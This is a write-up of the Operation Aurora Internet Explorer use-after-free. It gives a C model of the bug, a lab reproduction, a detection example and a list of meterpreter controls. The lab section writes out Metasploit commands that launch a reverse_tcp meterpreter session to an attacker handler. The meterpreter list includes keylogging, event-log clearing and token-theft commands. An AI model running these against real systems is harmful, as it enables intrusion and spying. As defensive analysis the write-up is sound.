Operation Aurora, widely reported to have originated in China, was a major attack campaign of the recent past. It used exploit code for an Internet Explorer vulnerability to compromise companies such as Google and Adobe and succeeded in stealing intellectual property.
According to Microsoft Security Advisory 979352, the vulnerability (CVE-2010-0249) exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution. In other words, this is a use-after-free bug: the browser keeps a pointer to an object after that object has been deleted, and a page that controls what the freed memory is reused for (for example by spraying the heap) controls what the browser executes when it dereferences the stale pointer.
So far the vulnerability has been exploited in the wild on IE 6. IE 7 is also vulnerable, but at the time of writing no working IE 7 exploit had been demonstrated because of memory layout differences in IE 7. Exploit code has been published on the internet and can be used by anyone to craft similar attacks. Metasploit, an open-source penetration-testing framework, has also released a working exploit module, which is explained in detail in the last section.
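To make the bug class concrete, here is an added, constructed model of the failure Microsoft describes. It is not the Aurora trigger, not Microsoft's or Metasploit's code, and it does not reproduce IE's real object layout. It uses a toy fixed-size-chunk allocator in place of the Windows heap, a placeholder vtable value (0x7c801000) for the legitimate object, and the 0x0c0d0c0d pattern the public Aurora exploit sprayed across the heap. An event object keeps a raw pointer to a DOM-like element; in the vulnerable path the element is freed while the event still points at it and the attacker's spray reclaims the chunk, so the next virtual call reads an attacker-chosen vtable. The hardened path shows one generic remedy, a counted reference held by the event, which is an assumption of this example and not a description of Microsoft's actual patch.

```c
/* Constructed model of a use-after-free reclaimed by a heap spray.
   Not the Aurora exploit and not IE's object layout; see the lead-in. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_WORDS 16   /* 64-byte chunks, a single size class */
#define NCHUNKS     8

/* Simulated heap. Freed chunks are handed out again first-fit, which is what
   lets an attacker's allocation land exactly where the deleted object was. */
static uint32_t pool[NCHUNKS][CHUNK_WORDS];
static int      in_use[NCHUNKS];

static void sim_reset(void) {
    memset(in_use, 0, sizeof in_use);
    memset(pool, 0, sizeof pool);
}

static void *sim_alloc(void) {
    for (int i = 0; i < NCHUNKS; i++)
        if (!in_use[i]) { in_use[i] = 1; return pool[i]; }
    return NULL;
}

static void sim_free(void *p) {
    for (int i = 0; i < NCHUNKS; i++)
        if ((void *)pool[i] == p) in_use[i] = 0;
}

/* DOM-like element. The first word stands in for the vtable pointer, the field
   a C++ object dereferences first when a virtual method is called on it. */
typedef struct Element {
    uint32_t vtable;
    int      refcount;
} Element;

/* Event object that remembers which element fired it (srcElement in IE). */
typedef struct Event {
    Element *src;
} Event;

#define REAL_VTABLE   0x7c801000u   /* constructed placeholder for a real vtable */
#define SPRAY_PATTERN 0x0c0d0c0du   /* value the public Aurora exploit sprayed */

static Element *element_create(void) {
    Element *e = sim_alloc();
    e->vtable = REAL_VTABLE;
    e->refcount = 1;                 /* the DOM tree's own reference */
    return e;
}

/* Attacker side: grab every free chunk and fill it with the spray pattern. */
static void attacker_spray(void) {
    uint32_t *w;
    while ((w = sim_alloc()) != NULL)
        for (int j = 0; j < CHUNK_WORDS; j++) w[j] = SPRAY_PATTERN;
}

/* What the browser reads when it later calls a virtual method on ev->src. */
static uint32_t dispatch_vtable(const Event *ev) { return ev->src->vtable; }

/* Vulnerable: the event stores a raw pointer and takes no reference, so
   removing the element frees it while the event still points at the chunk. */
uint32_t run_vulnerable(void) {
    sim_reset();
    Element *img = element_create();
    Event ev = { img };              /* pointer copied, no reference taken */
    sim_free(img);                   /* element removed from the page and deleted */
    attacker_spray();                /* freed chunk is reclaimed with 0x0c0d0c0d */
    return dispatch_vtable(&ev);     /* dangling pointer: attacker-controlled vtable */
}

/* Hardened (assumed remedy): the event holds a counted reference, so the
   element cannot be freed while anything can still reach it. */
static void element_release(Element *e) {
    if (--e->refcount == 0) sim_free(e);
}

uint32_t run_hardened(void) {
    sim_reset();
    Element *img = element_create();
    Event ev = { img };
    img->refcount++;                 /* event takes its own reference */
    element_release(img);            /* DOM drops its reference; object survives */
    attacker_spray();                /* spray only gets the other chunks */
    uint32_t v = dispatch_vtable(&ev);
    element_release(ev.src);         /* last reference goes, chunk freed safely */
    return v;
}

int main(void) {
    printf("vulnerable dispatch reads vtable 0x%08x\n", run_vulnerable());
    printf("hardened   dispatch reads vtable 0x%08x\n", run_hardened());
    return 0;
}
```

Compiled and run, the vulnerable path reports vtable 0x0c0d0c0d and the hardened one 0x7c801000. The point is the ordering: delete, reclaim, then use. DEP and Protected Mode from the mitigation list below do not prevent the stale read; they limit what the attacker can do once the browser calls through the fake vtable.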
Mitigations and mitigating factors for this vulnerability, according to Microsoft, are listed below:
- Data Execution Prevention (DEP) is enabled by default in Internet Explorer 8 on the following Windows operating systems: Windows XP Service Pack 3, Windows Vista Service Pack 1, Windows Vista Service Pack 2, and Windows 7. (The test systems used later in this write-up run Windows XP SP2, so this protection does not apply to them.)
- Protected Mode in Internet Explorer on Windows Vista and later Windows operating systems limits the impact of the vulnerability.
- In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.
- An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.
- By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone.
- By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the restricted sites zone. The Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.
Exploiting the Vulnerability:
We reproduced the attack scenario with Metasploit and it worked on the first attempt. It was sobering to see how the exploit works and how little effort it takes for an attacker to gain control of a vulnerable system.
Software used for the attack and analysis:
- Metasploit Framework
- Two networked VMware images running Windows XP SP2 (one as attacker, one as victim)
- Tcpview, to inspect the victim's network connections
We set up Metasploit in one VMware image to act as the attacker's server, which both serves the exploit page and receives the connection back from the compromised system, by issuing the following commands:
```
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.1.30
LHOST => 192.168.1.30
msf exploit(ie_aurora) > set LPORT 6666
LPORT => 6666
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > exploit
```
This was the response, which shows that the exploit server and the handler for the reverse connection were started:
```
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on port 6666
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.30:8080/
[*] Server started.
```
We then opened Internet Explorer in the vulnerable system (the other VMware image, running Windows XP SP2) and browsed to the URL Metasploit printed (http://192.168.1.30:8080/ in our case). The server end responded with the following:
```
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)
```
We then issued the following command to start interacting with the exploited system:
```
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
```
Examining the exploited system:
Using Tcpview on the exploited system, we checked its open ports and connections and found the channel opened by the exploit. A screenshot of the backdoor can be found below:
The connection opened by Internet Explorer can be seen in fig 1.1; this is what serves as the backdoor in this scenario. Note that it is not a listening port: the windows/meterpreter/reverse_tcp payload makes iexplore.exe connect out from local port 1038 to the attacker's handler at 192.168.1.30:6666, which is exactly what the session line above shows. Because the connection is outbound, a firewall that only blocks inbound connections does nothing to stop it.
Apart from this one connection, nothing on the victim indicates that the computer has been compromised and can be controlled from a remote server.
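The indicator described above can be checked automatically rather than by eye in Tcpview. The following is an added example written for this write-up, not part of the original and not Metasploit's code. It parses constructed output in the layout of `netstat -ano` on Windows XP (the same data Tcpview displays) together with a constructed PID-to-image map of the kind `tasklist` provides, and flags any browser process with an established connection to a port other than 80, 443 or 8080. The sample lines, addresses and PIDs are made up to match the scenario on this page; the browser list and port list are assumptions a deployment would tune.

```c
/* Constructed detection example: flag browser processes with established TCP
   connections to non-web ports. Sample data is made up to match this write-up. */
#include <stdio.h>
#include <string.h>

typedef struct Conn {
    char laddr[16]; int lport;
    char raddr[16]; int rport;
    int  pid;
} Conn;

/* Constructed sample in the layout of `netstat -ano`. PID 1520 is the victim's
   iexplore.exe; the 6666 line is the meterpreter reverse_tcp session. */
const char NETSTAT_SAMPLE[] =
    "Proto  Local Address          Foreign Address        State           PID\n"
    "TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       936\n"
    "TCP    192.168.1.57:139       0.0.0.0:0              LISTENING       4\n"
    "TCP    192.168.1.57:1036      192.168.1.30:8080      ESTABLISHED     1520\n"
    "TCP    192.168.1.57:1038      192.168.1.30:6666      ESTABLISHED     1520\n"
    "TCP    192.168.1.57:1040      203.0.113.5:443        ESTABLISHED     1520\n"
    "UDP    0.0.0.0:445            *:*                                    4\n";

/* Constructed PID-to-image map, as `tasklist` would give it. */
typedef struct { int pid; const char *image; } PidImage;
static const PidImage PID_IMAGE[] = {
    {4, "System"}, {936, "svchost.exe"}, {1520, "iexplore.exe"},
};

static const char *image_for(int pid) {
    for (size_t i = 0; i < sizeof PID_IMAGE / sizeof PID_IMAGE[0]; i++)
        if (PID_IMAGE[i].pid == pid) return PID_IMAGE[i].image;
    return "?";
}

/* Parse one netstat line; returns 1 only for an ESTABLISHED TCP connection.
   The header line and UDP lines ("*:*") fail the address scanset and are skipped. */
static int parse_line(const char *line, Conn *c) {
    char proto[8], state[16];
    int n = sscanf(line, "%7s %15[0-9.]:%d %15[0-9.]:%d %15s %d",
                   proto, c->laddr, &c->lport, c->raddr, &c->rport, state, &c->pid);
    return n == 7 && strcmp(proto, "TCP") == 0 && strcmp(state, "ESTABLISHED") == 0;
}

/* Split the text on newlines and collect established connections. */
int parse_established(const char *text, Conn *out, int max) {
    int count = 0;
    const char *p = text;
    while (*p && count < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[128];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_line(line, &out[count])) count++;
        p = nl ? nl + 1 : p + len;
    }
    return count;
}

/* Assumed policy: which images are browsers and which remote ports look like
   ordinary browsing. 8080 is included because the exploit page itself was served there. */
static int is_browser(const char *image) {
    return strcmp(image, "iexplore.exe") == 0 || strcmp(image, "firefox.exe") == 0;
}
static int is_web_port(int port) { return port == 80 || port == 443 || port == 8080; }

/* Returns the number of suspicious connections copied into hits. */
int suspicious_browser_connections(const char *netstat, Conn *hits, int max) {
    Conn conns[32];
    int n = parse_established(netstat, conns, 32), found = 0;
    for (int i = 0; i < n && found < max; i++)
        if (is_browser(image_for(conns[i].pid)) && !is_web_port(conns[i].rport))
            hits[found++] = conns[i];
    return found;
}

int main(void) {
    Conn hits[8];
    int n = suspicious_browser_connections(NETSTAT_SAMPLE, hits, 8);
    for (int i = 0; i < n; i++)
        printf("%s (pid %d) %s:%d -> %s:%d\n", image_for(hits[i].pid), hits[i].pid,
               hits[i].laddr, hits[i].lport, hits[i].raddr, hits[i].rport);
    return 0;
}
```

On the sample, the exploit page fetch on port 8080 and the HTTPS connection pass as ordinary browsing; only the payload's connection from local port 1038 to the handler on port 6666 is flagged. The check is a heuristic: an attacker who sets LPORT to 80 or 443 evades it, so it belongs alongside the Microsoft mitigations listed earlier rather than in place of them.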
Controlling the Exploited computer:
It is sobering to see how completely a compromised computer can be controlled. An example of a shell being controlled from the server can be seen below:
The following meterpreter commands can be used to control the compromised system, including the shell command, which drops into a Windows command shell on the victim:
Core Commands
=============
| Command | Description |
| ------- | ----------- |
| ? | Help menu |
| background | Backgrounds the current session |
| channel | Displays information about active channels |
| close | Closes a channel |
| exit | Terminate the meterpreter session |
| help | Help menu |
| interact | Interacts with a channel |
| irb | Drop into irb scripting mode |
| migrate | Migrate the server to another process |
| quit | Terminate the meterpreter session |
| read | Reads data from a channel |
| run | Executes a meterpreter script |
| use | Load one or more meterpreter extensions |
| write | Writes data to a channel |
Stdapi: File system Commands
============================
| Command | Description |
| ------- | ----------- |
| cat | Read the contents of a file to the screen |
| cd | Change directory |
| del | Delete the specified file |
| download | Download a file or directory |
| edit | Edit a file |
| getlwd | Print local working directory |
| getwd | Print working directory |
| lcd | Change local working directory |
| lpwd | Print local working directory |
| ls | List files |
| mkdir | Make directory |
| pwd | Print working directory |
| rm | Delete the specified file |
| rmdir | Remove directory |
| upload | Upload a file or directory |
Stdapi: Networking Commands
===========================
| Command | Description |
| ------- | ----------- |
| ipconfig | Display interfaces |
| portfwd | Forward a local port to a remote service |
| route | View and modify the routing table |
Stdapi: System Commands
=======================
| Command | Description |
| ------- | ----------- |
| clearev | Clear the event log |
| drop_token | Relinquishes any active impersonation token. |
| execute | Execute a command |
| getpid | Get the current process identifier |
| getprivs | Get as many privileges as possible |
| getuid | Get the user that the server is running as |
| kill | Terminate a process |
| ps | List running processes |
| reboot | Reboots the remote computer |
| reg | Modify and interact with the remote registry |
| rev2self | Calls RevertToSelf() on the remote machine |
| shell | Drop into a system command shell |
| shutdown | Shuts down the remote computer |
| steal_token | Attempts to steal an impersonation token from the target process |
| sysinfo | Gets information about the remote system, such as OS |
Stdapi: User interface Commands
===============================
| Command | Description |
| ------- | ----------- |
| enumdesktops | List all accessible desktops and window stations |
| idletime | Returns the number of seconds the remote user has been idle |
| keyscan_dump | Dump the keystroke buffer |
| keyscan_start | Start capturing keystrokes |
| keyscan_stop | Stop capturing keystrokes |
| setdesktop | Move to a different workstation and desktop |
| uictl | Control some of the user interface components |
References
- Metasploit blog, Reproducing the "Aurora" IE Exploit: http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
- Microsoft Security Advisory (979352), Vulnerability in Internet Explorer Could Allow Remote Code Execution: http://www.microsoft.com/technet/security/advisory/979352.mspx